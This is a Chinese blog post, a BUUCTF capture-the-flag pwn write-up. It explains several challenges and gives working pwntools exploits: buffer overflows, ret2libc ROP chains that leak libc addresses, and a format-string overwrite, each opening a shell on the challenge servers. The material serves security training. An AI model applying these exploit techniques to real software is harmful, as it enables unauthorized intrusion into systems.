

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://image.0error.net/favicon.png">
  <link rel="icon" href="https://image.0error.net/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Jason">
  <meta name="keywords" content="">
  
    <meta name="description" content="rip根据IDA加载入main函数声明发现s数组距离rbp的距离为F，即为15，这里的运行环境是64位，所以应当将Caller&#39;s rbp的数据填满，在这里是8位，即可构造payload 123456from pwn import *p&#x3D;remote(&quot;node4.buuoj.cn&quot;, 25401)#p&#x3D;process(&quot;.&#x2F;pwn1&quot;)payloa">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF-Pwn">
<meta property="og:url" content="https://www.0error.net/2021/10/46d4a28d.html">
<meta property="og:site_name" content="Jason Chen&#39;s Blog">
<meta property="og:description" content="rip根据IDA加载入main函数声明发现s数组距离rbp的距离为F，即为15，这里的运行环境是64位，所以应当将Caller&#39;s rbp的数据填满，在这里是8位，即可构造payload 123456from pwn import *p&#x3D;remote(&quot;node4.buuoj.cn&quot;, 25401)#p&#x3D;process(&quot;.&#x2F;pwn1&quot;)payloa">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://image.0error.net/img/202220220610191811.png">
<meta property="og:image" content="https://image.0error.net/img/202220220610204552.png">
<meta property="og:image" content="https://image.0error.net/img/202220220611171440.png">
<meta property="og:image" content="https://image.0error.net/img/202220220611171133.png">
<meta property="og:image" content="https://image.0error.net/img/202220220611171355.png">
<meta property="og:image" content="https://image.0error.net/img/2022/20220925184502.png">
<meta property="og:image" content="https://image.0error.net/img/2022/20221024204049.png">
<meta property="og:image" content="https://image.0error.net/img/2022/20221024204414.png">
<meta property="article:published_time" content="2021-10-11T11:30:30.000Z">
<meta property="article:modified_time" content="2023-11-08T04:25:37.533Z">
<meta property="article:author" content="Jason">
<meta property="article:tag" content="buu">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://image.0error.net/img/202220220610191811.png">
  
  
  
  <title>BUUCTF-Pwn - Jason Chen&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"www.0error.net","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":50,"cursorChar":"|","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":200}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":"bad56014d4869a580f4ebb27cf549354","google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  
    <!-- Baidu Analytics -->
    <script async>
      if (!Fluid.ctx.dnt) {
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?bad56014d4869a580f4ebb27cf549354";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
      }
    </script>
  

  

  

  

  

  

  



  
<meta name="generator" content="Hexo 6.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Jiajun Chen&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://image.0error.net/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="BUUCTF-Pwn"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2021-10-11 19:30" pubdate>
          2021年10月11日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          <!-- compatible with older versions-->
          全文共有 15k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          <!-- compatible with older versions-->
          阅读全文预计需要 124 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">BUUCTF-Pwn</h1>
            
              <p class="note note-info">
                
                  
                    <!-- compatible with older versions-->
                    本文最后更新于：2023年11月8日 中午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h2 id="rip"><a href="#rip" class="headerlink" title="rip"></a>rip</h2><p>根据IDA加载入main函数声明发现s数组距离<code>rbp</code>的距离为F，即为15，这里的运行环境是64位，所以应当将<code>Caller&#39;s rbp</code>的数据填满，在这里是8位，即可构造payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>p=remote(<span class="hljs-string">&quot;node4.buuoj.cn&quot;</span>, <span class="hljs-number">25401</span>)<br><span class="hljs-comment">#p=process(&quot;./pwn1&quot;)</span><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">15</span>+<span class="hljs-string">b&#x27;b&#x27;</span>*<span class="hljs-number">8</span>+p64(<span class="hljs-number">0x401186</span>+<span class="hljs-number">1</span>)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="jarvisoj-level0"><a href="#jarvisoj-level0" class="headerlink" title="jarvisoj_level0"></a>jarvisoj_level0</h2><p>打开IDA主函数两条命令，很明显可利用漏洞就在<code>vulnerable_function</code>函数内，进入后看到buf很明显距离rbp有0x80位，再加上64位机多出来的8位，即覆盖<code>0x80+0x8</code>即可覆盖，另外有<code>callsystem</code>函数作为漏洞执行入口</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>p=remote(<span class="hljs-string">&quot;node4.buuoj.cn&quot;</span>, <span class="hljs-number">27716</span>)<br><span class="hljs-comment">#p=process(&quot;./level0&quot;)</span><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">136</span>+p64(<span class="hljs-number">0x400596</span>)<br><span class="hljs-comment">#p.sendline(payload)</span><br>p.sendlineafter(<span class="hljs-string">&#x27;Hello, World\n&#x27;</span>,payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="ciscn-2019-c-1"><a href="#ciscn-2019-c-1" class="headerlink" title="ciscn_2019_c_1"></a>ciscn_2019_c_1</h2><p>首先获取程序的ROP信息<code>ROPgadget --binary ciscn_2019_c_1 --only &#39;pop|ret&#39;</code><br><img src="https://image.0error.net/img/202220220610191811.png" srcset="/img/loading.gif" lazyload alt="ROPinfo"><br>后面的具体操作见代码注释</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br>p=remote(<span class="hljs-string">&quot;node4.buuoj.cn&quot;</span>, <span class="hljs-number">27706</span>)<br><span class="hljs-comment">#p=process(&quot;./ciscn_2019_c_1&quot;)</span><br>elf=ELF(<span class="hljs-string">&quot;./ciscn_2019_c_1&quot;</span>)<br>main=<span class="hljs-number">0x400b28</span><br>rdi=<span class="hljs-number">0x400c83</span><br>ret=<span class="hljs-number">0x4006b9</span><br>puts_plt=elf.plt[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>puts_got=elf.got[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>p.sendlineafter(<span class="hljs-string">&#x27;Input your choice!\n&#x27;</span>, <span class="hljs-string">&#x27;1&#x27;</span>)<br>payload=<span class="hljs-string">b&#x27;\0&#x27;</span>+<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x50</span>-<span class="hljs-number">1</span>+<span class="hljs-number">8</span>)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main)<span class="hljs-comment">#构造以输出puts_got的内容</span><br>p.sendlineafter(<span class="hljs-string">&#x27;Input your Plaintext to be encrypted\n&#x27;</span>, payload)<br>p.recvline()<br>p.recvline()<br>puts_addr=u64(p.recvuntil(<span class="hljs-string">&#x27;\n&#x27;</span>)[:-<span class="hljs-number">1</span>].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\0&#x27;</span>))<span class="hljs-comment">#得到puts函数的地址</span><br>libc=LibcSearcher(<span class="hljs-string">&quot;puts&quot;</span>, puts_addr)<br>libc_base=puts_addr-libc.dump(<span class="hljs-string">&quot;puts&quot;</span>)<br>sys_addr=libc_base+libc.dump(<span class="hljs-string">&quot;system&quot;</span>)<br>binsh=libc_base+libc.dump(<span class="hljs-string">&quot;str_bin_sh&quot;</span>)<span class="hljs-comment">#使用LibcSearcher找到对应的libc版本号</span><br>p.sendlineafter(<span class="hljs-string">&#x27;choice!\n&#x27;</span>, <span class="hljs-string">&#x27;1&#x27;</span>)<br><span class="hljs-comment">#由于Ubuntu18运行机制与前面版本的不同，在调用system的时候需要进行栈对齐，在这里可以使用ret进行栈对齐</span><br>payload=<span class="hljs-string">b&#x27;\0&#x27;</span>+<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x50</span>-<span class="hljs-number">1</span>+<span class="hljs-number">8</span>)+p64(ret)+p64(rdi)+p64(binsh)+p64(sys_addr)<br><span class="hljs-comment">#p.sendline(payload)</span><br>p.sendlineafter(<span class="hljs-string">&#x27;encrypted\n&#x27;</span>,payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>经过暴力循环测试法，测得最终的libc版本为<code>libc6_2.27-0ubuntu3_amd64</code>，然后即可打通本poc  </p>
<h2 id="第五空间2019-决赛-PWN5-格式化字符串"><a href="#第五空间2019-决赛-PWN5-格式化字符串" class="headerlink" title="[第五空间2019 决赛]PWN5(格式化字符串)"></a>[第五空间2019 决赛]PWN5(格式化字符串)</h2><p>试着运行一下先，发现当输入的长度比较长的时候，回显会出现一点问题，所以合理猜测输出语句存在问题。<br><img src="https://image.0error.net/img/202220220610204552.png" srcset="/img/loading.gif" lazyload alt="out"><br>使用32位IDA载入，直接查看main函数</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">int</span> __cdecl <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> a1)</span><br>&#123;<br>  <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v1; <span class="hljs-comment">// eax</span><br>  <span class="hljs-type">int</span> result; <span class="hljs-comment">// eax</span><br>  <span class="hljs-type">int</span> fd; <span class="hljs-comment">// [esp+0h] [ebp-84h]</span><br>  <span class="hljs-type">char</span> nptr[<span class="hljs-number">16</span>]; <span class="hljs-comment">// [esp+4h] [ebp-80h] BYREF</span><br>  <span class="hljs-type">char</span> buf[<span class="hljs-number">100</span>]; <span class="hljs-comment">// [esp+14h] [ebp-70h] BYREF</span><br>  <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v6; <span class="hljs-comment">// [esp+78h] [ebp-Ch]</span><br>  <span class="hljs-type">int</span> *v7; <span class="hljs-comment">// [esp+7Ch] [ebp-8h]</span><br><br>  v7 = &amp;a1;<br>  v6 = __readgsdword(<span class="hljs-number">0x14</span>u);<br>  setvbuf(<span class="hljs-built_in">stdout</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>);<br>  v1 = time(<span class="hljs-number">0</span>);<br>  srand(v1);<br>  fd = open(<span class="hljs-string">&quot;/dev/urandom&quot;</span>, <span class="hljs-number">0</span>);<br>  read(fd, &amp;dword_804C044, <span class="hljs-number">4u</span>);<br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;your name:&quot;</span>);<br>  read(<span class="hljs-number">0</span>, buf, <span class="hljs-number">0x63</span>u);<br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Hello,&quot;</span>);<br>  <span class="hljs-built_in">printf</span>(buf);<br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;your passwd:&quot;</span>);<br>  read(<span class="hljs-number">0</span>, nptr, <span class="hljs-number">0xF</span>u);<br>  <span class="hljs-keyword">if</span> ( atoi(nptr) == dword_804C044 )<br>  &#123;<br>    <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;ok!!&quot;</span>);<br>    system(<span class="hljs-string">&quot;/bin/sh&quot;</span>);<br>  &#125;<br>  <span class="hljs-keyword">else</span><br>  &#123;<br>    <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;fail&quot;</span>);<br>  &#125;<br>  result = <span class="hljs-number">0</span>;<br>  <span class="hljs-keyword">if</span> ( __readgsdword(<span class="hljs-number">0x14</span>u) != v6 )<br>    sub_80493D0();<br>  <span class="hljs-keyword">return</span> result;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>首先看了看栈溢出漏洞，read做了限制字符大小利用不了，但是看到了一个<code>printf(buf)</code>这就是一个明显的格式化字符漏洞，再结合题目分析一波，大概流程是随机生成一个数字存入到地址为<code>dword_804C044</code>的全局变量中，最后对输入的<code>passwd</code>字符进行比较，这里注意下<code>atoi</code>这个函数它只会提取正整数，除此之外都是返回0，因为<code>dword</code>变量是随机数，所以控制不了（之前见过一题也是随机数，但是它的随机种子在栈里面是可控的，然后用栈溢出，再引用<code>ctypes</code>库，加载<code>libc.so.6</code>然后就可以获得系统一样的随机数了），但是这题很明显就是通过<code>printf(buf)</code>这个漏洞去更改<code>dword</code>变量的值<br>关于格式化字符串攻击，这里可以从以下两个资料着手了解<br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/0xJDchen/p/5904816.html">详谈Format String</a><br><a target="_blank" rel="noopener" href="https://sec.mrfan.xyz/2018/10/23/%E3%80%90%E6%95%B4%E7%90%86%E7%AC%94%E8%AE%B0%E3%80%91%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E6%A2%B3%E7%90%86/">【整理笔记】格式化字符串漏洞梳理</a><br>利用<code>AAAA %08x %08x %8x %08x %08x %08x %08x...</code>这样的字符串来找到我们输入的参数在函数栈上的位置<br>假设是在栈中的第n位，则可利用<code>%n$</code>定位到参数在栈上的位置，特别值得一提的是，这里的%n中如果是n则默认只想ESP指向的栈顶的内容指向的内存地址，而如果是一个具体的数值x则是指向[ESP+x]<br>因此在这道题中，我们就可以把我们不知道的<code>dword_804C044</code>改为我们设定的数值即可，由此编写poc</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>p = remote(<span class="hljs-string">&quot;node4.buuoj.cn&quot;</span>, <span class="hljs-number">28042</span>)<br><br>addr=<span class="hljs-number">0x0804C044</span><br>payload=p32(addr)+p32(addr+<span class="hljs-number">1</span>)+p32(addr+<span class="hljs-number">2</span>)+p32(addr+<span class="hljs-number">3</span>)<br>payload+=<span class="hljs-string">b&#x27;%10$n%11$n%12$n%13$n&#x27;</span><br>p.sendline(payload)<br>p.sendline(<span class="hljs-built_in">str</span>(<span class="hljs-number">0x10101010</span>))<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>最终得到flag  </p>
<h2 id="ciscn-2019-n-8"><a href="#ciscn-2019-n-8" class="headerlink" title="ciscn_2019_n_8"></a>ciscn_2019_n_8</h2><p>打开之后查main函数逻辑，然后你就会发现原来是一道水题- -，只要保证var数组第14位为0x11即可getshell，直接什么都不看编写poc梭哈</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>p = remote(<span class="hljs-string">&quot;node4.buuoj.cn&quot;</span>, <span class="hljs-number">27097</span>)<br><br><span class="hljs-comment">#addr=0x0804C044</span><br>payload=p32(<span class="hljs-number">0x11</span>)*<span class="hljs-number">14</span><br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>梭哈成功✌</p>
<h2 id="jarvisoj-level2"><a href="#jarvisoj-level2" class="headerlink" title="jarvisoj_level2"></a>jarvisoj_level2</h2><p>IDA分析，<code>vulnerable_function</code>中有关于buf的read函数，且buf距离<code>ebp</code>长度为0x88，而read指定长度为0x100，再经过checksec查看，确认存在栈溢出漏洞。<br>查看字符串发现程序内已经包含了<code>/bin/sh</code>字符串且具有system函数，因此溢出思路为填充buf跳转到system函数，然后传入字符串<code>/bin/sh</code>作为参数即可getshell，编写poc如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>p = remote(<span class="hljs-string">&quot;node4.buuoj.cn&quot;</span>, <span class="hljs-number">28037</span>)<br><br>binsh=<span class="hljs-number">0x0804A024</span><br>system=<span class="hljs-number">0x8048320</span><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x88</span>+<span class="hljs-number">4</span>)+p32(system)+<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">4</span>+p32(binsh)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>成功打通，cat flag</p>
<h2 id="OGeek2019-babyrop"><a href="#OGeek2019-babyrop" class="headerlink" title="[OGeek2019]babyrop"></a>[OGeek2019]babyrop</h2><p>初期逻辑和前面一道题比较像，buf给一个随机数，然后拿用户输入与buf进行比较，显然这里没有利用空间。<br><img src="https://image.0error.net/img/202220220611171440.png" srcset="/img/loading.gif" lazyload alt="main"><br><img src="https://image.0error.net/img/202220220611171133.png" srcset="/img/loading.gif" lazyload alt="804871F"><br>在sub_804871F函数里面很明显看到有<code>strlen(buf)</code>，这里有一个利用点，即strlen遇到<code>\x00</code>时直接截断，所以我们第一位直接截断即可绕过此部分，然后发现buf是一个7位数饿数组，但是在函数中有<code>read(0, buf, 0x20u)</code>，经计算，v5就相当于buf的第8位，所以v5在这里可以被我们指定。<br><img src="https://image.0error.net/img/202220220611171355.png" srcset="/img/loading.gif" lazyload><br>而另一个函数sub_80487D0中a1就是main函数中传入的v5，buf的地址为[ebp-E7],如果v5为127，则会执行第一条代码，C8&lt;E7,不能覆盖返回地址，v5需要尽可能的大，才能覆盖到返回地址。<br>根据上述思路，进行exp编写，这里一开始是想在绕过之后利用read&#x2F;write泄露地址然后通过LibcSearcher找到libc版本号的，但是发现不是很成功…通过泄露的地址未能找到正确的libc，结果回头一看题目里面已经给出libc了- -既然如此那就直接用了。真可谓众里寻他千百度，得来全不费工夫，最后把LibcSearcher的部分注释了，<del>也算是一种复习吧</del></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br><br>p = remote(<span class="hljs-string">&quot;node4.buuoj.cn&quot;</span>, <span class="hljs-number">28820</span>)<br>elf=ELF(<span class="hljs-string">&#x27;./pwn1&#x27;</span>)<br>libc=ELF(<span class="hljs-string">&#x27;./libc-2.23.so&#x27;</span>)<br><br>system_libc=libc.symbols[<span class="hljs-string">&#x27;system&#x27;</span>]<br>binsh_libc=<span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b&#x27;/bin/sh&#x27;</span>))<br>write_plt=elf.plt[<span class="hljs-string">&#x27;write&#x27;</span>]<br>write_got=elf.got[<span class="hljs-string">&#x27;write&#x27;</span>]<br>write_libc=libc.symbols[<span class="hljs-string">&#x27;write&#x27;</span>]<br>read_got=elf.got[<span class="hljs-string">&#x27;read&#x27;</span>]<br>read_plt=elf.plt[<span class="hljs-string">&#x27;read&#x27;</span>]<br><br>main_addr=<span class="hljs-number">0x8048825</span><br><br><span class="hljs-comment">#payload1-截断strlen</span><br>payload1=<span class="hljs-string">b&#x27;\x00&#x27;</span>+<span class="hljs-string">b&#x27;\xff&#x27;</span>*<span class="hljs-number">7</span><br>p.sendline(payload1)<br>p.recvuntil(<span class="hljs-string">&quot;Correct\n&quot;</span>)<br><br><span class="hljs-comment">#pay;pad2 - 泄露read的got地址</span><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0xe7</span>+<span class="hljs-number">4</span>)+p32(write_plt)+p32(main_addr)<br><span class="hljs-comment">#                        ret1          ret2</span><br>payload+=p32(<span class="hljs-number">1</span>)+p32(write_got)+p32(<span class="hljs-number">4</span>)<br><span class="hljs-comment">#write     par1     par2        par3</span><br><span class="hljs-comment">#write_plt覆盖的是sub_80487D0函数的返回地址，而write函数是main函数的函数，所以后面需要有三个write的参数</span><br>p.sendline(payload)<br><br>write_addr=u32(p.recv(<span class="hljs-number">4</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;[+]write_addr: &#x27;</span>, <span class="hljs-built_in">hex</span>(write_addr))<span class="hljs-comment">#得到了write在内存中的位置 可以用题目提供的函数共享库算出system在内存中的位置</span><br><br><span class="hljs-comment"># libc=LibcSearcher(&#x27;read&#x27;, read_addr)</span><br><span class="hljs-comment"># libc_base=read_addr-libc.dump(&#x27;read&#x27;)</span><br><span class="hljs-comment"># system_addr=libc_base+libc.dump(&#x27;system&#x27;)</span><br><span class="hljs-comment"># binsh_addr=libc_base+libc.dump(&#x27;str_bin_sh&#x27;)</span><br>libc_base=write_addr-write_libc<br>system_addr=system_libc+libc_base<br>binsh_addr=binsh_libc+libc_base<br><br>p.sendline(payload1)<br>p.recvuntil(<span class="hljs-string">&quot;Correct\n&quot;</span>)<br><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0xe7</span>+<span class="hljs-number">4</span>)<br>payload+=p32(system_addr)+p32(main_addr)+p32(binsh_addr)<span class="hljs-comment">#第二次直接把返回地址改为addr地址</span><br>p.sendline(payload)<br><br>p.interactive()<br></code></pre></td></tr></table></figure>

